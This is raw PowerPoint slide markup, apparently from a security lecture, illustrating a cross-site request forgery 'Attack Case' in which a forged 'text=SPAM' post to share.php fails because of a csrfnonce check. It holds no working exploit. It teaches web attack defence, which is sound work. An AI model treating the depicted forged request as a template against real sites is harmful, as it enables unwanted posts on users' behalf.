                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="238125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5163" y="101523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44265" y="68907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="54263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="84722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="119125"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="952500" h="1266825">
                  <a:moveTo>
                    <a:pt x="952500" y="119125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="952500" y="1147826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947336" y="1165425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908234" y="1198020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="1225924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="1237658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="1247669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="1255775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="1261791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1265536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="1266825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1265536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="1261791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="1255775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="1247669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="1237658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="1225924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="1212650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="1182218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1147826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10685272" y="1682664"/>
            <a:ext cx="828040" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1693" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8595698" y="1583267"/>
            <a:ext cx="1868593" cy="1483360"/>
            <a:chOff x="6446773" y="1187450"/>
            <a:chExt cx="1401445" cy="1112520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6887590" y="1800351"/>
              <a:ext cx="960755" cy="499109"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="854860" y="42247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="464947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16890" y="499110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="956675" y="11049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934847" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837691" y="128016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834828" y="135018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834882" y="142319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837674" y="149072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843026" y="154431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850028" y="157293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857329" y="157225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864082" y="154396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869441" y="148971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960374" y="11302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956675" y="11049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="892617" y="44861"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930994" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="910589" y="17652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="921221" y="17652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930994" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934847" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921221" y="17652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="917955" y="11049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921221" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="795781" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="788267" y="972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781954" y="4635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777476" y="10394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775461" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776434" y="25185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780097" y="31527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785856" y="36012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793114" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956675" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795781" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6459473" y="1200150"/>
              <a:ext cx="1295400" cy="762635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1295400" h="762635">
                  <a:moveTo>
                    <a:pt x="1295400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7466456" y="1673733"/>
              <a:ext cx="288925" cy="288925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="288925" h="288925">
                  <a:moveTo>
                    <a:pt x="288417" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57658" y="57657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="288543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288417" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CDCDCD"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6459473" y="1200150"/>
              <a:ext cx="1295400" cy="762635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1295400" h="762635">
                  <a:moveTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1064641" y="531240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8970263" y="1631356"/>
            <a:ext cx="1013460" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“F</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>el</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ng  Good!”</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="1600115"/>
            <a:ext cx="4978400" cy="1545167"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3733800" h="1158875">
                <a:moveTo>
                  <a:pt x="0" y="1158430"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3733800" y="1158430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3733800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1158430"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="385D89"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>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44" name="object 44"/>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45" name="object 45"/>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46" name="object 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3601635" y="3031811"/>
            <a:ext cx="2451100" cy="505460"/>
            <a:chOff x="2701226" y="2273858"/>
            <a:chExt cx="1838325" cy="379095"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705989" y="227862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48" name="object 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705989" y="227862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49" name="object 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614335" y="3062731"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 51"/>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50" name="object 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454400" y="2572528"/>
            <a:ext cx="4775200" cy="265949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F1F1F1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="39793" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="122764">
              <a:spcBef>
                <a:spcPts val="313"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type="hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name="csrfnonce"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs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31207" y="450638"/>
            <a:ext cx="3526367" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Case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008024" y="4321726"/>
            <a:ext cx="2165773" cy="994545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4233" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="ctr">
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fails </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>because</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-40" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-860" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>incorrect</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="3635756"/>
            <a:ext cx="6249247" cy="944880"/>
            <a:chOff x="2209800" y="2726817"/>
            <a:chExt cx="4686935" cy="70866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20" name="object 20"/>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1" name="object 21"/>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22" name="object 22"/>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text=SPAM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
